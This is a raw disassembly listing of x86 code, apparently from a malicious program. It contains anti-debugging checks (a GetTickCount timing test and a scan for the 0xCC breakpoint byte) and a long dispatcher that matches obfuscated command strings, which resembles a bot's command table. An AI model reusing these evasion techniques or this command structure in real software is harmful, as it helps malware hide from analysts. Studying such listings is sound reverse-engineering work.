call dword_437184 ; GetTickCount
sub eax, [ebp+var_C]
cmp eax, 1388h
jbe short loc_40A84F
loc_40A845: ; CODE XREF: sub_40A708+71�j
; sub_40A708+C6�j ...
mov dword_4561F0, edi
mov eax, edi
jmp short loc_40A851
; ---------------------------------------------------------------------------
loc_40A84F: ; CODE XREF: sub_40A708+13B�j
xor eax, eax
loc_40A851: ; CODE XREF: sub_40A708+15�j
; sub_40A708+145�j
pop edi
pop esi
pop ebx
leave
retn
sub_40A708 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A856 proc near ; DATA XREF: sub_40A708+56�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov al, [esi]
cmp al, 0CCh
jz short loc_40A867
xor eax, eax
jmp short loc_40A86C
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A856+B�j
mov eax, 1
loc_40A86C: ; CODE XREF: sub_40A856+F�j
pop esi
pop ebp
retn
sub_40A856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A86F proc near ; CODE XREF: sub_40A938+869�p
; sub_40A938+9244�p ...
var_5A8 = byte ptr -5A8h
var_5A7 = byte ptr -5A7h
var_1A8 = byte ptr -1A8h
var_154 = byte ptr -154h
var_100 = dword ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 5A8h
push ebx
push esi
push edi
lea eax, [ebp+var_5A8]
push [ebp+arg_0]
push eax
call dword_4370A4 ; lstrcpyA
cmp [ebp+var_5A7], 0
jz loc_40A930
mov al, [ebp+var_5A8]
cmp al, byte_443988
jnz loc_40A930
push 40h
lea eax, [ebp+var_100]
push [ebp+arg_0]
push eax
call sub_4276B6
mov ebx, eax
lea eax, [ebp+var_100]
push ebx
push eax
lea eax, [ebp+var_1A8]
push eax
call sub_420244
add esp, 18h
cmp [ebp+var_100], 0
mov esi, eax
lea edi, [ebp+var_154]
push 15h
pop ecx
rep movsd
jz short loc_40A930
mov eax, [ebp+var_100]
mov al, [eax]
cmp al, byte_443988
jnz short loc_40A930
push [ebp+arg_10]
inc [ebp+var_100]
lea eax, [ebp+var_5A8]
lea esi, [ebp+var_154]
sub esp, 54h
push 15h
pop ecx
mov edi, esp
push [ebp+arg_8]
rep movsd
push [ebp+arg_4]
push eax
lea eax, [ebp+var_100]
push ebx
push eax
call sub_40A938
add esp, 6Ch
loc_40A930: ; CODE XREF: sub_40A86F+23�j
; sub_40A86F+35�j ...
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_40A86F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A938 proc near ; CODE XREF: sub_40A86F+B9�p
; sub_420399+10E�p
var_6DBB0 = byte ptr -6DBB0h
var_6B4A0 = byte ptr -6B4A0h
var_68D90 = byte ptr -68D90h
var_66680 = byte ptr -66680h
var_63F70 = byte ptr -63F70h
var_61860 = byte ptr -61860h
var_5F150 = byte ptr -5F150h
var_5CA40 = byte ptr -5CA40h
var_5A330 = byte ptr -5A330h
var_57C20 = byte ptr -57C20h
var_55510 = byte ptr -55510h
var_52E00 = byte ptr -52E00h
var_506F0 = byte ptr -506F0h
var_4DFE0 = byte ptr -4DFE0h
var_4B8D0 = byte ptr -4B8D0h
var_491C0 = byte ptr -491C0h
var_46AB0 = byte ptr -46AB0h
var_443A0 = byte ptr -443A0h
var_41C90 = byte ptr -41C90h
var_3F580 = byte ptr -3F580h
var_3CE70 = byte ptr -3CE70h
var_3A760 = byte ptr -3A760h
var_38050 = byte ptr -38050h
var_35940 = byte ptr -35940h
var_33230 = byte ptr -33230h
var_30B20 = byte ptr -30B20h
var_2E410 = byte ptr -2E410h
var_2BD00 = byte ptr -2BD00h
var_295F0 = byte ptr -295F0h
var_26EE0 = byte ptr -26EE0h
var_247D0 = byte ptr -247D0h
var_220C0 = byte ptr -220C0h
var_1F9B0 = byte ptr -1F9B0h
var_1D2A0 = byte ptr -1D2A0h
var_1AB90 = byte ptr -1AB90h
var_18480 = byte ptr -18480h
var_15D70 = byte ptr -15D70h
var_13660 = byte ptr -13660h
var_10F50 = byte ptr -10F50h
var_E840 = byte ptr -0E840h
var_C131 = byte ptr -0C131h
var_C130 = byte ptr -0C130h
var_9A20 = byte ptr -9A20h
var_7310 = byte ptr -7310h
var_7180 = byte ptr -7180h
var_6D80 = byte ptr -6D80h
var_6C7C = dword ptr -6C7Ch
var_6C78 = byte ptr -6C78h
var_6878 = byte ptr -6878h
var_6478 = byte ptr -6478h
var_63F8 = dword ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = dword ptr -63F0h
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63E0 = dword ptr -63E0h
var_63DC = dword ptr -63DCh
var_63D8 = dword ptr -63D8h
var_63D4 = byte ptr -63D4h
var_62D0 = byte ptr -62D0h
var_61CC = byte ptr -61CCh
var_60CC = byte ptr -60CCh
var_5FC8 = byte ptr -5FC8h
var_5EC8 = byte ptr -5EC8h
var_5DC4 = byte ptr -5DC4h
var_5CC0 = byte ptr -5CC0h
var_5BC0 = dword ptr -5BC0h
var_5BBC = dword ptr -5BBCh
var_5ABC = byte ptr -5ABCh
var_59BC = byte ptr -59BCh
var_32AC = byte ptr -32ACh
var_31AC = byte ptr -31ACh
var_30AC = byte ptr -30ACh
var_2FAC = byte ptr -2FACh
var_2EA8 = byte ptr -2EA8h
var_2DA4 = byte ptr -2DA4h
var_2D24 = byte ptr -2D24h
var_2C20 = byte ptr -2C20h
var_2B80 = byte ptr -2B80h
var_2A7C = byte ptr -2A7Ch
var_2978 = dword ptr -2978h
var_2968 = dword ptr -2968h
var_28E4 = dword ptr -28E4h
var_28E0 = dword ptr -28E0h
var_285C = byte ptr -285Ch
var_27D8 = dword ptr -27D8h
var_27D4 = dword ptr -27D4h
var_27CC = dword ptr -27CCh
var_27C8 = byte ptr -27C8h
var_2748 = byte ptr -2748h
var_26C8 = byte ptr -26C8h
var_2648 = dword ptr -2648h
var_2644 = dword ptr -2644h
var_2640 = dword ptr -2640h
var_263C = dword ptr -263Ch
var_2638 = dword ptr -2638h
var_25B4 = dword ptr -25B4h
var_257C = dword ptr -257Ch
var_2574 = byte ptr -2574h
var_2470 = byte ptr -2470h
var_236C = byte ptr -236Ch
var_2268 = byte ptr -2268h
var_2230 = byte ptr -2230h
var_21F8 = byte ptr -21F8h
var_21C0 = dword ptr -21C0h
var_21B8 = byte ptr -21B8h
var_2124 = byte ptr -2124h
var_2020 = byte ptr -2020h
var_1F98 = dword ptr -1F98h
var_1F94 = dword ptr -1F94h
var_1F8C = byte ptr -1F8Ch
var_1F54 = byte ptr -1F54h
var_1F1C = dword ptr -1F1Ch
var_1F18 = byte ptr -1F18h
var_1E98 = byte ptr -1E98h
var_1E18 = byte ptr -1E18h
var_1D98 = dword ptr -1D98h
var_1D94 = dword ptr -1D94h
var_1D90 = dword ptr -1D90h
var_1D8C = dword ptr -1D8Ch
var_1D88 = dword ptr -1D88h
var_1D84 = dword ptr -1D84h
var_1D80 = dword ptr -1D80h
var_1D7C = dword ptr -1D7Ch
var_1D78 = byte ptr -1D78h
var_1D44 = dword ptr -1D44h
var_1D3C = byte ptr -1D3Ch
var_1CBC = byte ptr -1CBCh
var_1C34 = dword ptr -1C34h
var_1C2C = dword ptr -1C2Ch
var_1C28 = dword ptr -1C28h
var_1C24 = dword ptr -1C24h
var_1C20 = dword ptr -1C20h
var_1C18 = dword ptr -1C18h
var_1C14 = dword ptr -1C14h
var_1C10 = byte ptr -1C10h
var_1B90 = byte ptr -1B90h
var_1B10 = dword ptr -1B10h
var_1B08 = dword ptr -1B08h
var_1B04 = dword ptr -1B04h
var_1AFC = dword ptr -1AFCh
var_1AF8 = dword ptr -1AF8h
var_1AF4 = dword ptr -1AF4h
var_1AF0 = dword ptr -1AF0h
var_1AEC = byte ptr -1AECh
var_1A6C = dword ptr -1A6Ch
var_1A34 = dword ptr -1A34h
var_1A2C = dword ptr -1A2Ch
var_1A28 = byte ptr -1A28h
var_19A8 = dword ptr -19A8h
var_197C = dword ptr -197Ch
var_1978 = dword ptr -1978h
var_1970 = dword ptr -1970h
var_1968 = dword ptr -1968h
var_1964 = byte ptr -1964h
var_18E4 = byte ptr -18E4h
var_1864 = dword ptr -1864h
var_1860 = dword ptr -1860h
var_185C = dword ptr -185Ch
var_1858 = dword ptr -1858h
var_1854 = dword ptr -1854h
var_1850 = dword ptr -1850h
var_184C = dword ptr -184Ch
var_1848 = byte ptr -1848h
var_17C8 = byte ptr -17C8h
var_1748 = dword ptr -1748h
var_1744 = dword ptr -1744h
var_173C = dword ptr -173Ch
var_1738 = dword ptr -1738h
var_1734 = dword ptr -1734h
var_1730 = dword ptr -1730h
var_172C = dword ptr -172Ch
var_1724 = byte ptr -1724h
var_16A4 = byte ptr -16A4h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = dword ptr -1614h
var_1610 = dword ptr -1610h
var_160C = dword ptr -160Ch
var_1608 = dword ptr -1608h
var_1600 = dword ptr -1600h
var_15FC = dword ptr -15FCh
var_15F4 = byte ptr -15F4h
var_1574 = byte ptr -1574h
var_14EC = dword ptr -14ECh
var_14E8 = dword ptr -14E8h
var_14E4 = dword ptr -14E4h
var_14E0 = dword ptr -14E0h
var_14DC = dword ptr -14DCh
var_14D8 = dword ptr -14D8h
var_14D0 = dword ptr -14D0h
var_14CC = dword ptr -14CCh
var_14C4 = byte ptr -14C4h
var_1444 = byte ptr -1444h
var_13BC = dword ptr -13BCh
var_13B8 = dword ptr -13B8h
var_13B4 = dword ptr -13B4h
var_13B0 = dword ptr -13B0h
var_13AC = dword ptr -13ACh
var_13A8 = dword ptr -13A8h
var_13A0 = dword ptr -13A0h
var_139C = dword ptr -139Ch
var_1398 = byte ptr -1398h
var_1318 = byte ptr -1318h
var_1298 = dword ptr -1298h
var_1294 = dword ptr -1294h
var_1290 = dword ptr -1290h
var_128C = dword ptr -128Ch
var_1288 = dword ptr -1288h
var_1284 = dword ptr -1284h
var_127C = dword ptr -127Ch
var_1278 = dword ptr -1278h
var_1274 = byte ptr -1274h
var_11F4 = byte ptr -11F4h
var_1174 = dword ptr -1174h
var_1170 = dword ptr -1170h
var_116C = dword ptr -116Ch
var_1168 = dword ptr -1168h
var_1164 = dword ptr -1164h
var_1160 = dword ptr -1160h
var_115C = dword ptr -115Ch
var_1158 = dword ptr -1158h
var_1154 = byte ptr -1154h
var_10D4 = byte ptr -10D4h
var_1054 = dword ptr -1054h
var_1050 = dword ptr -1050h
var_104C = dword ptr -104Ch
var_1048 = dword ptr -1048h
var_1044 = dword ptr -1044h
var_1040 = dword ptr -1040h
var_103C = dword ptr -103Ch
var_1038 = dword ptr -1038h
var_1034 = byte ptr -1034h
var_FB4 = byte ptr -0FB4h
var_F34 = dword ptr -0F34h
var_F30 = dword ptr -0F30h
var_F2C = dword ptr -0F2Ch
var_F28 = dword ptr -0F28h
var_F24 = dword ptr -0F24h
var_F20 = dword ptr -0F20h
var_F1C = dword ptr -0F1Ch
var_F18 = dword ptr -0F18h
var_F14 = byte ptr -0F14h
var_E94 = dword ptr -0E94h
var_E84 = dword ptr -0E84h
var_E80 = dword ptr -0E80h
var_E68 = dword ptr -0E68h
var_E64 = dword ptr -0E64h
var_E5C = dword ptr -0E5Ch
var_E54 = dword ptr -0E54h
var_E50 = byte ptr -0E50h
var_DD0 = dword ptr -0DD0h
var_DC0 = dword ptr -0DC0h
var_DBC = dword ptr -0DBCh
var_DA4 = dword ptr -0DA4h
var_DA0 = dword ptr -0DA0h
var_D98 = dword ptr -0D98h
var_D90 = byte ptr -0D90h
var_D5C = byte ptr -0D5Ch
var_D28 = byte ptr -0D28h
var_CF4 = byte ptr -0CF4h
var_CE4 = dword ptr -0CE4h
var_CE0 = byte ptr -0CE0h
var_C60 = dword ptr -0C60h
var_C58 = dword ptr -0C58h
var_C54 = dword ptr -0C54h
var_C50 = dword ptr -0C50h
var_C4C = dword ptr -0C4Ch
var_C48 = dword ptr -0C48h
var_C44 = byte ptr -0C44h
var_BC4 = dword ptr -0BC4h
var_BC0 = dword ptr -0BC0h
var_BBC = dword ptr -0BBCh
var_BB8 = dword ptr -0BB8h
var_BB4 = dword ptr -0BB4h
var_BB0 = dword ptr -0BB0h
var_BAC = byte ptr -0BACh
var_B2C = dword ptr -0B2Ch
var_B1C = dword ptr -0B1Ch
var_B00 = dword ptr -0B00h
var_AFC = dword ptr -0AFCh
var_AF8 = dword ptr -0AF8h
var_AF4 = dword ptr -0AF4h
var_AEC = dword ptr -0AECh
var_AE8 = byte ptr -0AE8h
var_A68 = dword ptr -0A68h
var_A4C = dword ptr -0A4Ch
var_A3C = dword ptr -0A3Ch
var_A38 = dword ptr -0A38h
var_A30 = dword ptr -0A30h
var_A28 = dword ptr -0A28h
var_A24 = byte ptr -0A24h
var_970 = dword ptr -970h
var_964 = dword ptr -964h
var_95C = byte ptr -95Ch
var_85C = dword ptr -85Ch
var_858 = dword ptr -858h
var_850 = dword ptr -850h
var_848 = dword ptr -848h
var_840 = dword ptr -840h
var_838 = dword ptr -838h
var_834 = dword ptr -834h
var_82C = dword ptr -82Ch
var_828 = byte ptr -828h
var_7A8 = dword ptr -7A8h
var_7A4 = dword ptr -7A4h
var_77C = dword ptr -77Ch
var_778 = dword ptr -778h
var_774 = dword ptr -774h
var_770 = dword ptr -770h
var_768 = byte ptr -768h
var_728 = dword ptr -728h
var_724 = byte ptr -724h
var_6A4 = dword ptr -6A4h
var_6A0 = dword ptr -6A0h
var_69C = dword ptr -69Ch
var_694 = dword ptr -694h
var_690 = dword ptr -690h
var_68C = dword ptr -68Ch
var_678 = dword ptr -678h
var_674 = dword ptr -674h
var_670 = dword ptr -670h
var_66C = dword ptr -66Ch
var_664 = dword ptr -664h
var_660 = byte ptr -660h
var_5E0 = dword ptr -5E0h
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = dword ptr -5C4h
var_5B4 = dword ptr -5B4h
var_5B0 = dword ptr -5B0h
var_5AC = dword ptr -5ACh
var_5A8 = dword ptr -5A8h
var_5A0 = dword ptr -5A0h
var_59C = byte ptr -59Ch
var_51C = dword ptr -51Ch
var_518 = dword ptr -518h
var_4F0 = dword ptr -4F0h
var_4EC = dword ptr -4ECh
var_4E8 = dword ptr -4E8h
var_4E4 = dword ptr -4E4h
var_4DC = dword ptr -4DCh
var_4D8 = byte ptr -4D8h
var_458 = dword ptr -458h
var_454 = dword ptr -454h
var_450 = dword ptr -450h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_418 = byte ptr -418h
var_314 = byte ptr -314h
var_304 = byte ptr -304h
var_2F4 = word ptr -2F4h
var_2F2 = word ptr -2F2h
var_2F0 = dword ptr -2F0h
var_2E4 = byte ptr -2E4h
var_2D4 = byte ptr -2D4h
var_2C4 = byte ptr -2C4h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = dword ptr -200h
var_1F8 = dword ptr -1F8h
var_174 = byte ptr -174h
var_164 = byte ptr -164h
var_154 = byte ptr -154h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = word ptr -90h
var_8E = dword ptr -8Eh
var_80 = byte ptr -80h
var_7C = dword ptr -7Ch
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_2C = dword ptr 34h
arg_30 = dword ptr 38h
arg_34 = dword ptr 3Ch
arg_38 = byte ptr 40h
arg_3C = dword ptr 44h
arg_40 = dword ptr 48h
arg_44 = dword ptr 4Ch
arg_48 = dword ptr 50h
arg_4C = dword ptr 54h
arg_50 = dword ptr 58h
arg_54 = dword ptr 5Ch
arg_58 = dword ptr 60h
arg_5C = dword ptr 64h
arg_60 = dword ptr 68h
arg_64 = dword ptr 6Ch
arg_68 = dword ptr 70h
push ebp
mov ebp, esp
mov eax, 6DBB0h
call sub_429A90
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp [ebp+arg_68], esi
push edi
mov edi, dword_437174
jz short loc_40A98B
push dword ptr [ebx]
push offset aDehziSaO0 ; "deHZI/SA//o0"
call edi ; dword_437174
test eax, eax
jz loc_4148CF
push dword ptr [ebx]
push offset aEuior0ay2w7__0 ; "EUIOR0ay2w7."
call edi ; dword_437174
test eax, eax
jz loc_4148CF
push dword ptr [ebx]
push offset aUc6wg1ovwvt1 ; "uc6Wg1OvWVt1"
call edi ; dword_437174
test eax, eax
jz loc_4148CF
loc_40A98B: ; CODE XREF: sub_40A938+1E�j
cmp [ebp+arg_24], esi
jz loc_40AD49
push dword ptr [ebx]
push offset aOb4iqKj5ue_ ; "Ob4iQ/KJ5ue."
call edi ; dword_437174
test eax, eax
jnz short loc_40A9C0
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push 6
loc_40A9A8: ; CODE XREF: sub_40A938+9C�j
; sub_40A938+B2�j ...
push esi
mov eax, [ebp+arg_C]
push [ebp+arg_20]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [eax+0Ch]
jmp loc_412BEC
; ---------------------------------------------------------------------------
loc_40A9C0: ; CODE XREF: sub_40A938+67�j
push dword ptr [ebx]
push offset aHyomeIovtv_ ; "HyOMe/iovtV."
call edi ; dword_437174
test eax, eax
jnz short loc_40A9D6
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push 2
jmp short loc_40A9A8
; ---------------------------------------------------------------------------
loc_40A9D6: ; CODE XREF: sub_40A938+93�j
push dword ptr [ebx]
push offset a47ff020f_0_ ; "47Ff/020f.0."
call edi ; dword_437174
test eax, eax
jnz short loc_40A9EC
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push 1
jmp short loc_40A9A8
; ---------------------------------------------------------------------------
loc_40A9EC: ; CODE XREF: sub_40A938+A9�j
push dword ptr [ebx]
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
call edi ; dword_437174
test eax, eax
jnz short loc_40AA02
push offset aLtlec18us5q0 ; "LTLec18US5q0"
push 12h
jmp short loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AA02: ; CODE XREF: sub_40A938+BF�j
push dword ptr [ebx]
push offset aM5spx_qp7lx_ ; "M5sPX.Qp7Lx."
call edi ; dword_437174
test eax, eax
jnz short loc_40AA18
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push 13h
jmp short loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AA18: ; CODE XREF: sub_40A938+D5�j
push dword ptr [ebx]
push offset a9ljbh07crkd_ ; "9lJBH07crkD."
call edi ; dword_437174
test eax, eax
jnz short loc_40AA31
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push 14h
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AA31: ; CODE XREF: sub_40A938+EB�j
push dword ptr [ebx]
push offset aVp1weJvqbn_ ; "VP1WE/JVQbn."
call edi ; dword_437174
test eax, eax
jnz short loc_40AA4A
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push 4
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AA4A: ; CODE XREF: sub_40A938+104�j
push dword ptr [ebx]
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
call edi ; dword_437174
test eax, eax
jz loc_40AD3D
push dword ptr [ebx]
push offset a2mo7g0_b0qj ; "2mo7G0.B0qj/"
call edi ; dword_437174
test eax, eax
jz loc_40AD3D
push dword ptr [ebx]
push offset a9bwj__lz2my0 ; "9bWj..lZ2My0"
call edi ; dword_437174
test eax, eax
jnz short loc_40AA95
push [ebp+arg_20]
mov eax, [ebp+arg_C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push dword ptr [eax+0Ch]
call sub_403374
jmp loc_4146D5
; ---------------------------------------------------------------------------
loc_40AA95: ; CODE XREF: sub_40A938+13F�j
push dword ptr [ebx]
push offset aH1cmq0wqw5c_ ; "h1cMQ0wQw5C."
call edi ; dword_437174
test eax, eax
jz loc_40AD31
push dword ptr [ebx]
push offset aSxytb1_eejq_ ; "SXYtb1.EEjQ."
call edi ; dword_437174
test eax, eax
jz loc_40AD31
push dword ptr [ebx]
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
call edi ; dword_437174
test eax, eax
jz loc_40AD31
push dword ptr [ebx]
push offset a8im6i__c829_ ; "8Im6i..C829."
call edi ; dword_437174
test eax, eax
jz loc_40AD31
push dword ptr [ebx]
push offset aTiyj208fhvn_ ; "tIYj208FHvN."
call edi ; dword_437174
test eax, eax
jz loc_40AD31
push dword ptr [ebx]
push offset a5ngN0zjh2i1 ; "5nG/N0ZJh2i1"
call edi ; dword_437174
test eax, eax
jz loc_40AD31
push dword ptr [ebx]
push offset aMdf9n0kzpx60 ; "mdf9n0kzPX60"
call edi ; dword_437174
test eax, eax
jz loc_40AD31
push dword ptr [ebx]
push offset aAtfv_jgk0x1 ; "/ATfv.jgK0X1"
call edi ; dword_437174
test eax, eax
jz loc_40AD31
push dword ptr [ebx]
push offset aFu6k10irsc1 ; "fu6k10iRsc/1"
call edi ; dword_437174
test eax, eax
jz loc_40AD31
push dword ptr [ebx]
push offset a_luua_bruje0 ; ".lUua.bruje0"
call edi ; dword_437174
test eax, eax
jnz short loc_40AB47
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push 9
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AB47: ; CODE XREF: sub_40A938+201�j
push dword ptr [ebx]
push offset aUycsBekwp0 ; "/uYcs/BEKWP0"
call edi ; dword_437174
test eax, eax
jnz short loc_40AB60
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push 0Ah
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AB60: ; CODE XREF: sub_40A938+21A�j
push dword ptr [ebx]
push offset aFhzdv1ootfg0 ; "fhzdV1OotFg0"
call edi ; dword_437174
test eax, eax
jnz short loc_40AB79
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push 0Bh
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40AB79: ; CODE XREF: sub_40A938+233�j
push dword ptr [ebx]
push offset aUfbss0cbo8c__0 ; "uFbSS0Cbo8C."
call edi ; dword_437174
test eax, eax
jnz short loc_40AB8D
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jmp short loc_40AB9F
; ---------------------------------------------------------------------------
loc_40AB8D: ; CODE XREF: sub_40A938+24C�j
push dword ptr [ebx]
push offset aNoazx1alvg0 ; "NoaZx1Alvg/0"
call edi ; dword_437174
test eax, eax
jnz short loc_40ABA6
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
loc_40AB9F: ; CODE XREF: sub_40A938+253�j
push 11h
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40ABA6: ; CODE XREF: sub_40A938+260�j
push dword ptr [ebx]
push offset aSud8hRsu8j1 ; "sUd8h/rsu8j1"
call edi ; dword_437174
test eax, eax
jz loc_40AD25
push dword ptr [ebx]
push offset aJ2yyw_j09xc ; "j2yYw.J09XC/"
call edi ; dword_437174
test eax, eax
jz loc_40AD25
push dword ptr [ebx]
push offset aRiocl1kztwo0 ; "rioCl1kzTWO0"
call edi ; dword_437174
test eax, eax
jnz short loc_40ABE1
push offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
push 15h
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40ABE1: ; CODE XREF: sub_40A938+29B�j
push dword ptr [ebx]
push offset a7fugu_n0u2m1 ; "7FUgU.N0U2m1"
call edi ; dword_437174
test eax, eax
jnz short loc_40ABF8
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
jmp loc_40AD1E
; ---------------------------------------------------------------------------
loc_40ABF8: ; CODE XREF: sub_40A938+2B4�j
push dword ptr [ebx]
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
call edi ; dword_437174
test eax, eax
jz loc_40AD19
push dword ptr [ebx]
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
call edi ; dword_437174
test eax, eax
jz loc_40AD19
push dword ptr [ebx]
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
call edi ; dword_437174
test eax, eax
jz loc_40AD19
push dword ptr [ebx]
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
call edi ; dword_437174
test eax, eax
jz loc_40AD19
push dword ptr [ebx]
push offset aXmz20Gjkq ; "xMz20//gJkQ/"
call edi ; dword_437174
test eax, eax
jnz short loc_40AC53
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jmp loc_40AD1E
; ---------------------------------------------------------------------------
loc_40AC53: ; CODE XREF: sub_40A938+30F�j
push dword ptr [ebx]
push offset aX_62c_3ldcp ; "X.62C.3LDCP/"
call edi ; dword_437174
test eax, eax
jnz short loc_40AC6A
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jmp loc_40AD1E
; ---------------------------------------------------------------------------
loc_40AC6A: ; CODE XREF: sub_40A938+326�j
push dword ptr [ebx]
push offset aImvbw1shwxq0 ; "iMvbW1SHwxQ0"
call edi ; dword_437174
test eax, eax
jnz short loc_40AC81
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jmp loc_40AD1E
; ---------------------------------------------------------------------------
loc_40AC81: ; CODE XREF: sub_40A938+33D�j
push dword ptr [ebx]
push offset aUyfog_dvvny0 ; "UyfOG.DvVnY0"
call edi ; dword_437174
test eax, eax
jz loc_40AD12
push dword ptr [ebx]
push offset aPsern1aagh6_ ; "pSern1AAGh6."
call edi ; dword_437174
test eax, eax
jz short loc_40AD12
push dword ptr [ebx]
push offset aXkg84_cesgs_ ; "XkG84.cESgs."
call edi ; dword_437174
test eax, eax
jz short loc_40AD12
push dword ptr [ebx]
push offset aP06vqBfbmo_ ; "p06vq/BFBMo."
call edi ; dword_437174
test eax, eax
jz short loc_40AD12
push dword ptr [ebx]
push offset aW1w2v121jsp_ ; "w1w2V121JSP."
call edi ; dword_437174
test eax, eax
jnz short loc_40ACCD
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
jmp short loc_40AD1E
; ---------------------------------------------------------------------------
loc_40ACCD: ; CODE XREF: sub_40A938+38C�j
push dword ptr [ebx]
push offset aEm42x_1iszi1 ; "Em42x.1IsZI1"
call edi ; dword_437174
test eax, eax
jz short loc_40ACE7
push dword ptr [ebx]
push offset aKmdie1uwntq ; "KmdIe1UwntQ/"
call edi ; dword_437174
test eax, eax
jnz short loc_40ACF3
loc_40ACE7: ; CODE XREF: sub_40A938+3A0�j
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push 0Eh
jmp loc_40A9A8
; ---------------------------------------------------------------------------
loc_40ACF3: ; CODE XREF: sub_40A938+3AD�j
push dword ptr [ebx]
push offset aV6jbh0k4uD_ ; "V6jBH0k4u/d."
call edi ; dword_437174
test eax, eax
jnz short loc_40AD49
push esi
push offset aIexplore_exe ; "iexplore.exe"
call sub_41FD79
pop ecx
pop ecx
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40AD12: ; CODE XREF: sub_40A938+354�j
; sub_40A938+365�j ...
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp short loc_40AD1E
; ---------------------------------------------------------------------------
loc_40AD19: ; CODE XREF: sub_40A938+2CB�j
; sub_40A938+2DC�j ...
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
loc_40AD1E: ; CODE XREF: sub_40A938+2BB�j
; sub_40A938+316�j ...
push 0Dh
jmp loc_40A9A8
